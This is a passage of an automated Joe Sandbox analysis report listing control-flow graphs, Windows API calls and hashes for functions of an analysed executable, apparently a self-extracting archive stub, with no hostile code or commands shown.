                                                                                                                        control_flow_graph 978 eb3b72-eb3b7c 979 eb3bee-eb3bf1 978->979 980 eb3b7e-eb3b8c 979->980 981 eb3bf3 979->981 983 eb3b8e-eb3b91 980->983 984 eb3b95-eb3bb1 LoadLibraryExW 980->984 982 eb3bf5-eb3bf9 981->982 985 eb3c09-eb3c0b 983->985 986 eb3b93 983->986 987 eb3bfa-eb3c00 984->987 988 eb3bb3-eb3bbc GetLastError 984->988 985->982 990 eb3beb 986->990 987->985 989 eb3c02-eb3c03 FreeLibrary 987->989 991 eb3bbe-eb3bd3 call eb6088 988->991 992 eb3be6-eb3be9 988->992 989->985 990->979 991->992 995 eb3bd5-eb3be4 LoadLibraryExW 991->995 992->990 995->987 995->992
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00EB3C35,?,?,00EF2088,00000000,?,00EB3D60,00000004,InitializeCriticalSectionEx,00EC6394,InitializeCriticalSectionEx,00000000), ref: 00EB3C03
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID: api-ms-
                                                                                                                        • API String ID: 3664257935-2084034818
                                                                                                                        • Opcode ID: aaed153d925b1506c2735a8a5adfdda4bf46908cc921f463cf281ad48ea221a5
                                                                                                                        • Instruction ID: 22042767c07d8267631dd039056731d1a08954ba3aea1a4064e3e90d117db080
                                                                                                                        • Opcode Fuzzy Hash: aaed153d925b1506c2735a8a5adfdda4bf46908cc921f463cf281ad48ea221a5
                                                                                                                        • Instruction Fuzzy Hash: 1D110636A04221ABCF228B7D9C82FDB77A49F01774F211221E911FB294E771EF058AD1
                                                                                                                        Function 00EAAC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EA081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EA0836
                                                                                                                          • Part of subcall function 00EA081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E9F2D8,Crypt32.dll,00000000,00E9F35C,?,?,00E9F33E,?,?,?), ref: 00EA0858
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00EAAC2F
                                                                                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00EAAC66
                                                                                                                        • SHGetMalloc.SHELL32(00ED8438), ref: 00EAAC70
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                        • String ID: riched20.dll$3Oo
                                                                                                                        • API String ID: 3498096277-671628130
                                                                                                                        • Opcode ID: ac4c11d8bce61036f9de42574a6fba6178c6f890beb563e1e53f0a20a4307bec
                                                                                                                        • Instruction ID: 21ce911dfd219f098721fa87dc7cb33acccfe47078a5bc84e88895249e1bf855
                                                                                                                        • Opcode Fuzzy Hash: ac4c11d8bce61036f9de42574a6fba6178c6f890beb563e1e53f0a20a4307bec
                                                                                                                        • Instruction Fuzzy Hash: 1DF0F9B1900209AFCB10AFAAD9499EFFBFCEF95700F00415AA415F2241DBB45606CBA1
                                                                                                                        Function 00E998E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1000 e998e0-e99901 call eaec50 1003 e9990c 1000->1003 1004 e99903-e99906 1000->1004 1006 e9990e-e9991f 1003->1006 1004->1003 1005 e99908-e9990a 1004->1005 1005->1006 1007 e99921 1006->1007 1008 e99927-e99931 1006->1008 1007->1008 1009 e99933 1008->1009 1010 e99936-e99943 call e96edb 1008->1010 1009->1010 1013 e9994b-e9996a CreateFileW 1010->1013 1014 e99945 1010->1014 1015 e999bb-e999bf 1013->1015 1016 e9996c-e9998e GetLastError call e9bb03 1013->1016 1014->1013 1018 e999c3-e999c6 1015->1018 1021 e999c8-e999cd 1016->1021 1022 e99990-e999b3 CreateFileW GetLastError 1016->1022 1020 e999d9-e999de 1018->1020 1018->1021 1024 e999ff-e99a10 1020->1024 1025 e999e0-e999e3 1020->1025 1021->1020 1023 e999cf 1021->1023 1022->1018 1026 e999b5-e999b9 1022->1026 1023->1020 1028 e99a2e-e99a39 1024->1028 1029 e99a12-e99a2a call ea0602 1024->1029 1025->1024 1027 e999e5-e999f9 SetFileTime 1025->1027 1026->1018 1027->1024 1029->1028
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00E97760,?,00000005,?,00000011), ref: 00E9995F
                                                                                                                        • GetLastError.KERNEL32(?,?,00E97760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E9996C
                                                                                                                        • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00E97760,?,00000005,?), ref: 00E999A2
                                                                                                                        • GetLastError.KERNEL32(?,?,00E97760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E999AA
                                                                                                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00E97760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E999F9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateErrorLast$Time
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1999340476-0
                                                                                                                        • Opcode ID: 1726cb54d78d7dec97d68284a47a450fd484bca4745d47e5e416384733f31621
                                                                                                                        • Instruction ID: 84460df5c7b84852493851bb2392ba46555576b79f82a4fecc20b7593ceeef56
                                                                                                                        • Opcode Fuzzy Hash: 1726cb54d78d7dec97d68284a47a450fd484bca4745d47e5e416384733f31621
                                                                                                                        • Instruction Fuzzy Hash: 723157315443416FEB309F28CC46BDABBD4BB85324F101B1DF9A1B61C2D3B5A988CB90
                                                                                                                        Function 00EAB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1059 eab568-eab581 PeekMessageW 1060 eab5bc-eab5be 1059->1060 1061 eab583-eab597 GetMessageW 1059->1061 1062 eab5a8-eab5b6 TranslateMessage DispatchMessageW 1061->1062 1063 eab599-eab5a6 IsDialogMessageW 1061->1063 1062->1060 1063->1060 1063->1062
                                                                                                                        APIs
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EAB579
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EAB58A
                                                                                                                        • IsDialogMessageW.USER32(0001043A,?), ref: 00EAB59E
                                                                                                                        • TranslateMessage.USER32(?), ref: 00EAB5AC
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00EAB5B6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1266772231-0
                                                                                                                        • Opcode ID: 51b2fd7b9d60a1aa9e1772cce65567f548f85f710018e933fb46bc3774e29548
                                                                                                                        • Instruction ID: fe6ce8e52d640aaa9a4d9cdd161a22fa02f4ee22b0bd9d2dc0bcc92c1967e783
                                                                                                                        • Opcode Fuzzy Hash: 51b2fd7b9d60a1aa9e1772cce65567f548f85f710018e933fb46bc3774e29548
                                                                                                                        • Instruction Fuzzy Hash: 95F0A971E0111AAA8B209BB6AC4CDEB7FACEF462957404416B515E2011EF24E609CBB0
                                                                                                                        Function 00EAABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1064 eaabab-eaabca GetClassNameW 1065 eaabcc-eaabe1 call ea1fbb 1064->1065 1066 eaabf2-eaabf4 1064->1066 1071 eaabe3-eaabef FindWindowExW 1065->1071 1072 eaabf1 1065->1072 1068 eaabff-eaac01 1066->1068 1069 eaabf6-eaabf9 SHAutoComplete 1066->1069 1069->1068 1071->1072 1072->1066
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(?,?,00000050), ref: 00EAABC2
                                                                                                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 00EAABF9
                                                                                                                          • Part of subcall function 00EA1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E9C116,00000000,.exe,?,?,00000800,?,?,?,00EA8E3C), ref: 00EA1FD1
                                                                                                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00EAABE9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                        • String ID: EDIT
                                                                                                                        • API String ID: 4243998846-3080729518
                                                                                                                        • Opcode ID: 9a209b16c5a8fecf3ef127132df44f702b901d2e331d3e494548e6dd5635c727
                                                                                                                        • Instruction ID: cd52f8e4863dc446ff5d1aa33cf5ed52c5491b672c0cc321d955604da90395c3
                                                                                                                        • Opcode Fuzzy Hash: 9a209b16c5a8fecf3ef127132df44f702b901d2e331d3e494548e6dd5635c727
                                                                                                                        • Instruction Fuzzy Hash: 1FF082327013287ADB2057259C09FAF76AC9F8BB40F485066BA05B61C0DB60EA85C5B6
                                                                                                                        Function 00EADBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1073 eadbde-eadc09 call eaec50 SetEnvironmentVariableW call ea0371 1077 eadc0e-eadc12 1073->1077 1078 eadc36-eadc38 1077->1078 1079 eadc14-eadc18 1077->1079 1080 eadc21-eadc28 call ea048d 1079->1080 1083 eadc1a-eadc20 1080->1083 1084 eadc2a-eadc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1078
                                                                                                                        APIs
                                                                                                                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00EADBF4
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00EADC30
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                        • String ID: sfxcmd$sfxpar
                                                                                                                        • API String ID: 1431749950-3493335439
                                                                                                                        • Opcode ID: 9bc6aa97433bba62f36119e2f4050aa6f73298bbbd5b8fff1d7e5cf47520a193
                                                                                                                        • Instruction ID: 7800ccbb09d9883d652f64742cc2a1ff125d1fc28ec2b5617796280909bf089a
                                                                                                                        • Opcode Fuzzy Hash: 9bc6aa97433bba62f36119e2f4050aa6f73298bbbd5b8fff1d7e5cf47520a193
                                                                                                                        • Instruction Fuzzy Hash: 92F054B24053247FCB101F958C05FFA7798EF0D7517441014BD45BD041D6B1A941D6B0
                                                                                                                        Function 00E99785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1085 e99785-e99791 1086 e9979e-e997b5 ReadFile 1085->1086 1087 e99793-e9979b GetStdHandle 1085->1087 1088 e99811 1086->1088 1089 e997b7-e997c0 call e998bc 1086->1089 1087->1086 1090 e99814-e99817 1088->1090 1093 e997d9-e997dd 1089->1093 1094 e997c2-e997ca 1089->1094 1096 e997df-e997e8 GetLastError 1093->1096 1097 e997ee-e997f2 1093->1097 1094->1093 1095 e997cc 1094->1095 1098 e997cd-e997d7 call e99785 1095->1098 1096->1097 1099 e997ea-e997ec 1096->1099 1100 e9980c-e9980f 1097->1100 1101 e997f4-e997fc 1097->1101 1098->1090 1099->1090 1100->1090 1101->1100 1103 e997fe-e99807 GetLastError 1101->1103 1103->1100 1105 e99809-e9980a 1103->1105 1105->1098
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00E99795
                                                                                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00E997AD
                                                                                                                        • GetLastError.KERNEL32 ref: 00E997DF
                                                                                                                        • GetLastError.KERNEL32 ref: 00E997FE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2244327787-0
                                                                                                                        • Opcode ID: 6b6a71c85ec56b8cf0f02b0f50cf5cf139670baec0bc66c4be3ca7d81c6de348
                                                                                                                        • Instruction ID: efe6c17c6402f7063c712dd4709a491fd700e53d91162145498bb6bc7c162f96
                                                                                                                        • Opcode Fuzzy Hash: 6b6a71c85ec56b8cf0f02b0f50cf5cf139670baec0bc66c4be3ca7d81c6de348
                                                                                                                        • Instruction Fuzzy Hash: 4B11C231910204EBCF345FBDC804AA937A9FB06325F10952EF826B5192DB758E44DB61
                                                                                                                        Function 00EBAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00EB3F73,00000000,00000000,?,00EBACDB,00EB3F73,00000000,00000000,00000000,?,00EBAED8,00000006,FlsSetValue), ref: 00EBAD66
                                                                                                                        • GetLastError.KERNEL32(?,00EBACDB,00EB3F73,00000000,00000000,00000000,?,00EBAED8,00000006,FlsSetValue,00EC7970,FlsSetValue,00000000,00000364,?,00EB98B7), ref: 00EBAD72
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00EBACDB,00EB3F73,00000000,00000000,00000000,?,00EBAED8,00000006,FlsSetValue,00EC7970,FlsSetValue,00000000), ref: 00EBAD80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3177248105-0
                                                                                                                        • Opcode ID: 50da4ab81959231136bf32af5a4d1e11b65beaab4862fed383801b4b95d00945
                                                                                                                        • Instruction ID: 21053928111f6660cc878b24465e48b5b19d05bf1816088a0c9eb58a8d9d6d89
                                                                                                                        • Opcode Fuzzy Hash: 50da4ab81959231136bf32af5a4d1e11b65beaab4862fed383801b4b95d00945
                                                                                                                        • Instruction Fuzzy Hash: 4D012432201222AFCF224F79DC44EDB7B58EF407AA7180230F916F3560CB21C806C6E1
                                                                                                                        Function 00EBBA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EB97E5: GetLastError.KERNEL32(?,00ED1030,00EB4674,00ED1030,?,?,00EB3F73,00000050,?,00ED1030,00000200), ref: 00EB97E9
                                                                                                                          • Part of subcall function 00EB97E5: _free.LIBCMT ref: 00EB981C
                                                                                                                          • Part of subcall function 00EB97E5: SetLastError.KERNEL32(00000000,?,00ED1030,00000200), ref: 00EB985D
                                                                                                                          • Part of subcall function 00EB97E5: _abort.LIBCMT ref: 00EB9863
                                                                                                                          • Part of subcall function 00EBBB4E: _abort.LIBCMT ref: 00EBBB80
                                                                                                                          • Part of subcall function 00EBBB4E: _free.LIBCMT ref: 00EBBBB4
                                                                                                                          • Part of subcall function 00EBB7BB: GetOEMCP.KERNEL32(00000000,?,?,00EBBA44,?), ref: 00EBB7E6
                                                                                                                        • _free.LIBCMT ref: 00EBBA9F
                                                                                                                        • _free.LIBCMT ref: 00EBBAD5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorLast_abort
                                                                                                                        • String ID: p
                                                                                                                        • API String ID: 2991157371-2678736219
                                                                                                                        • Opcode ID: 28fffff237f08946a7fff0457f97591cce8e4ab5e2b557a3e9037cca246f8b80
                                                                                                                        • Instruction ID: fe9372350e9d872ed440ec7d6511ad69203f921ada6cf06a6533964e79a8a661
                                                                                                                        • Opcode Fuzzy Hash: 28fffff237f08946a7fff0457f97591cce8e4ab5e2b557a3e9037cca246f8b80
                                                                                                                        • Instruction Fuzzy Hash: AC319131D04209AFDB10EFA9D541BDFB7E5EF40324F25509AE904BB2A2EBB29D41DB50
                                                                                                                        Function 00EAE528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: ($PDu<
                                                                                                                        • API String ID: 1269201914-2719109745
                                                                                                                        • Opcode ID: a3178e9412e70d44715e11a282f1fecc518a8ab838216f291dcecbd39addc977
                                                                                                                        • Instruction ID: 5c7ec5f0d9fdf983dc4b7489fdcfc7d97043cfc0494ec75424341aefe0be763e
                                                                                                                        • Opcode Fuzzy Hash: a3178e9412e70d44715e11a282f1fecc518a8ab838216f291dcecbd39addc977
                                                                                                                        • Instruction Fuzzy Hash: DBB012C1A581407C310861182F03D3F054DC1CBF14330B02FF508F8680EC812D020431
                                                                                                                        Function 00EAE532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: 2$PDu<
                                                                                                                        • API String ID: 1269201914-683690134
